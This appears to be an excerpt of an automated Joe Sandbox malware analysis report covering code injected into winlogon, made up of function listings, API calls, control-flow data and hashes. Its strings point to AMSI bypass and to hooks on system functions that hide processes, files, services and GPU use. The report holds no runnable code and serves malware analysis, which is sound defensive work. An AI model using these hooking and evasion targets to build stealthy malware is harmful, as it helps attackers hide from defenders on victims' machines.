                                                          Function 000002D0165E5220 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: c4bf4fdd1f139f7af51c663d4a05522b228e983f2573c9d1742d6a00230fc506
                                                          • Instruction ID: 2cedec1f4289c30b6c331ced25801c0d626d4383081f33ab3ac7db6053c34f55
                                                          • Opcode Fuzzy Hash: c4bf4fdd1f139f7af51c663d4a05522b228e983f2573c9d1742d6a00230fc506
                                                          • Instruction Fuzzy Hash: 68F03026618B84C0DB30EB81EC8535EA7A0F3987D4F940117FA8D03B79DB3ACA80CB00
                                                          Function 000002D0165E1AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002D0165E1628: GetProcessHeap.KERNEL32 ref: 000002D0165E1633
                                                            • Part of subcall function 000002D0165E1628: HeapAlloc.KERNEL32 ref: 000002D0165E1642
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E16B2
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E16DF
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1719
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.KERNELBASE ref: 000002D0165E1734
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1754
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E176F
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E178F
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E17CA
                                                          • SleepEx.KERNELBASE ref: 000002D0165E1AE3
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1805
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1820
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1840
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E185B
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E187B
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1896
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.KERNELBASE ref: 000002D0165E18A0
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 66e44494c7f656fe3ce444e5f8e737549d0e8d4baeb9513a9da4fbab288e4862
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 20310561E1068142FF709BA6DDD83EEB2A9AB84BC6F8450239E0D877B5EE15CD50C350

                                                          Non-executed Functions

                                                          Function 000002D0165E2BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 412 2d0165e2bf4-2d0165e2c6d 414 2d0165e2f88-2d0165e2fab 412->414 415 2d0165e2c73-2d0165e2c79 412->415 415->414 416 2d0165e2c7f-2d0165e2c82 415->416 416->414 417 2d0165e2c88-2d0165e2c8b 416->417 417->414 418 2d0165e2c91-2d0165e2ca1 GetModuleHandleA 417->418 419 2d0165e2cb5 418->419 420 2d0165e2ca3-2d0165e2cb3 GetProcAddress 418->420 421 2d0165e2cb8-2d0165e2cd6 419->421 420->421 421->414 423 2d0165e2cdc-2d0165e2cfb StrCmpNIW 421->423 423->414 424 2d0165e2d01-2d0165e2d05 423->424 424->414 425 2d0165e2d0b-2d0165e2d15 424->425 425->414 426 2d0165e2d1b-2d0165e2d22 425->426 426->414 427 2d0165e2d28-2d0165e2d3b 426->427 428 2d0165e2d3d-2d0165e2d49 427->428 429 2d0165e2d4b 427->429 430 2d0165e2d4e-2d0165e2d52 428->430 429->430 431 2d0165e2d54-2d0165e2d60 430->431 432 2d0165e2d62 430->432 433 2d0165e2d65-2d0165e2d6f 431->433 432->433 434 2d0165e2e55-2d0165e2e59 433->434 435 2d0165e2d75-2d0165e2d78 433->435 436 2d0165e2e5f-2d0165e2e62 434->436 437 2d0165e2f7a-2d0165e2f82 434->437 438 2d0165e2d8a-2d0165e2d94 435->438 439 2d0165e2d7a-2d0165e2d87 call 2d0165e1934 435->439 442 2d0165e2e64-2d0165e2e70 call 2d0165e1934 436->442 443 2d0165e2e73-2d0165e2e7d 436->443 437->414 437->427 440 2d0165e2dc8-2d0165e2dd2 438->440 441 2d0165e2d96-2d0165e2da3 438->441 439->438 447 2d0165e2dd4-2d0165e2de1 440->447 448 2d0165e2e02-2d0165e2e05 440->448 441->440 446 2d0165e2da5-2d0165e2db2 441->446 442->443 450 2d0165e2e7f-2d0165e2e8c 443->450 451 2d0165e2ead-2d0165e2eb0 443->451 454 2d0165e2db5-2d0165e2dbb 446->454 447->448 455 2d0165e2de3-2d0165e2df0 447->455 457 2d0165e2e07-2d0165e2e11 call 2d0165e1bc8 448->457 458 2d0165e2e13-2d0165e2e20 lstrlenW 448->458 450->451 459 2d0165e2e8e-2d0165e2e9b 450->459 452 2d0165e2ebd-2d0165e2eca lstrlenW 451->452 453 2d0165e2eb2-2d0165e2ebb call 2d0165e1bc8 451->453 465 2d0165e2ecc-2d0165e2edb call 2d0165e1c00 452->465 466 2d0165e2edd-2d0165e2ee7 call 2d0165e3c74 452->466 453->452 471 2d0165e2ef2-2d0165e2efd 453->471 463 2d0165e2e4b-2d0165e2e50 454->463 464 2d0165e2dc1-2d0165e2dc6 454->464 467 2d0165e2df3-2d0165e2df9 455->467 457->458 457->463 460 2d0165e2e22-2d0165e2e31 call 2d0165e1c00 458->460 461 2d0165e2e33-2d0165e2e45 call 2d0165e3c74 458->461 469 2d0165e2e9e-2d0165e2ea4 459->469 460->461 460->463 461->463 475 2d0165e2eea-2d0165e2eec 461->475 463->475 464->440 464->454 465->466 465->471 466->475 467->463 478 2d0165e2dfb-2d0165e2e00 467->478 470 2d0165e2ea6-2d0165e2eab 469->470 469->471 470->451 470->469 484 2d0165e2eff-2d0165e2f03 471->484 485 2d0165e2f74-2d0165e2f78 471->485 475->437 475->471 478->448 478->467 486 2d0165e2f0b-2d0165e2f25 call 2d0165e89f0 484->486 487 2d0165e2f05-2d0165e2f09 484->487 485->437 488 2d0165e2f28-2d0165e2f2b 486->488 487->486 487->488 491 2d0165e2f4e-2d0165e2f51 488->491 492 2d0165e2f2d-2d0165e2f4b call 2d0165e89f0 488->492 491->485 494 2d0165e2f53-2d0165e2f71 call 2d0165e89f0 491->494 492->491 494->485
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: 5e41e87b92a480212ae126d1164da57dd18493b5820a26e260cb34e0e6ffb87d
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: EFB17366210AE589EF648FA5DD897A9F3A4FB44BC4F849017EE0D537A8DB36CE40C740
                                                          Function 000002D0165E81C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 3f62921a25067518e1bfaa809f1cb7c698419ab88e171b7c7778bf021c1d484d
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: BC314F72205BC08AEB609FA0EC947ED7374F784744F84442ADA4E57BA4DF39CA48C710
                                                          Function 000002D0165ED6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: e5481f02f8261cb671bd9619e00b5a5215ab25be7af4c76cbfe084d40dae703c
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 3C315F36214FC086EB60CFA5EC8439E73A4F788754F940226EA9D47BA4DF39CA55CB00
                                                          Function 000002D0165E1D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 000002D0165E1D4B
                                                            • Part of subcall function 000002D0165E20C4: GetModuleHandleA.KERNEL32(?,?,?,000002D0165E1D7D), ref: 000002D0165E20DC
                                                            • Part of subcall function 000002D0165E20C4: GetProcAddress.KERNEL32(?,?,?,000002D0165E1D7D), ref: 000002D0165E20ED
                                                            • Part of subcall function 000002D0165E5F60: GetCurrentThreadId.KERNEL32 ref: 000002D0165E5F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: 42fe4f969bd3097bf71423927041cf8a4865869a26dc220f04bef47a29d86233
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 38416EA11009CAA4EF04EFE4ECEA7D46365BB40394FC09567A52D031B9AE7ACF4ED351
                                                          Function 000002D0165E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 8535c3407c90ca8d0a1e78cd43edddb1639353b3d75649769dad88b98a535dd3
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 55514072200B9486EB64CFA2E88C79AB7A1F788F99F444126DA4D07768DF3CC949C710
                                                          Function 000002D016586D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 10352f3621cfb05593126c12a9e106e399346f652ce8e41f9483bb92b936fa18
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: B981D3216102D286FB609BE79CCD36E23D8AB95788FD44027AA0D47FB6EF39CD518710
                                                          Function 000002D0165ED258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 365 2d0165ed258-2d0165ed27a GetLastError 366 2d0165ed27c-2d0165ed287 FlsGetValue 365->366 367 2d0165ed299-2d0165ed2a4 FlsSetValue 365->367 368 2d0165ed289-2d0165ed291 366->368 369 2d0165ed293 366->369 370 2d0165ed2ab-2d0165ed2b0 367->370 371 2d0165ed2a6-2d0165ed2a9 367->371 372 2d0165ed305-2d0165ed310 SetLastError 368->372 369->367 373 2d0165ed2b5 call 2d0165edafc 370->373 371->372 374 2d0165ed325-2d0165ed33b call 2d0165ecb78 372->374 375 2d0165ed312-2d0165ed324 372->375 376 2d0165ed2ba-2d0165ed2c6 373->376 387 2d0165ed33d-2d0165ed348 FlsGetValue 374->387 388 2d0165ed358-2d0165ed363 FlsSetValue 374->388 378 2d0165ed2d8-2d0165ed2e2 FlsSetValue 376->378 379 2d0165ed2c8-2d0165ed2cf FlsSetValue 376->379 382 2d0165ed2f6-2d0165ed300 call 2d0165ecfc4 call 2d0165edb74 378->382 383 2d0165ed2e4-2d0165ed2f4 FlsSetValue 378->383 381 2d0165ed2d1-2d0165ed2d6 call 2d0165edb74 379->381 381->371 382->372 383->381 391 2d0165ed34a-2d0165ed34e 387->391 392 2d0165ed352 387->392 394 2d0165ed3c8-2d0165ed3cf call 2d0165ecb78 388->394 395 2d0165ed365-2d0165ed36a 388->395 391->394 396 2d0165ed350 391->396 392->388 397 2d0165ed36f call 2d0165edafc 395->397 399 2d0165ed3bf-2d0165ed3c7 396->399 400 2d0165ed374-2d0165ed380 397->400 402 2d0165ed392-2d0165ed39c FlsSetValue 400->402 403 2d0165ed382-2d0165ed389 FlsSetValue 400->403 404 2d0165ed39e-2d0165ed3ae FlsSetValue 402->404 405 2d0165ed3b0-2d0165ed3b8 call 2d0165ecfc4 402->405 406 2d0165ed38b-2d0165ed390 call 2d0165edb74 403->406 404->406 405->399 411 2d0165ed3ba call 2d0165edb74 405->411 406->394 411->399
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED267
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED27C
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED29D
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2EC
                                                          • SetLastError.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000002D0165EF0FC,?,?,?,?,000002D0165EC3CF,?,?,?,?,?,000002D0165E7EE0), ref: 000002D0165ED35C
                                                            • Part of subcall function 000002D0165EDAFC: HeapAlloc.KERNEL32(?,?,00000000,000002D0165ED432,?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165EDB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED384
                                                            • Part of subcall function 000002D0165EDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002D0165E643A), ref: 000002D0165EDB8A
                                                            • Part of subcall function 000002D0165EDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D0165E643A), ref: 000002D0165EDB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED3A6
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 43972d606b00cc2be28d3e2c33b0ce1b5ff9d5d7083995bf257bda57e6b2045b
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: 1C4185223452C442FF58A7F95DDD36DE2425B497B0FD4572BA83E0A7F6DE2ACE418200
                                                          Function 000002D0165E2FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: 9399f2a70220d5fc83846a100c734f2598ba77da802c8d91112e16fcd82e6b36
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: D2319332A04A9086FB20CFA2AC8C759F3A0F788B95F844566DE4D43A75DF38CA558740
                                                          Function 000002D0165E30BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: b0b4c6f7df39834c1d93ccae1f79ff724c4c6fff3a16477284ecea33b86cda3e
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: 5D316D21A14B9186FB54DFA6ACCCB59B3A0B784F85F84412A9E8E43775DF38CD458700
                                                          Function 000002D016589D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
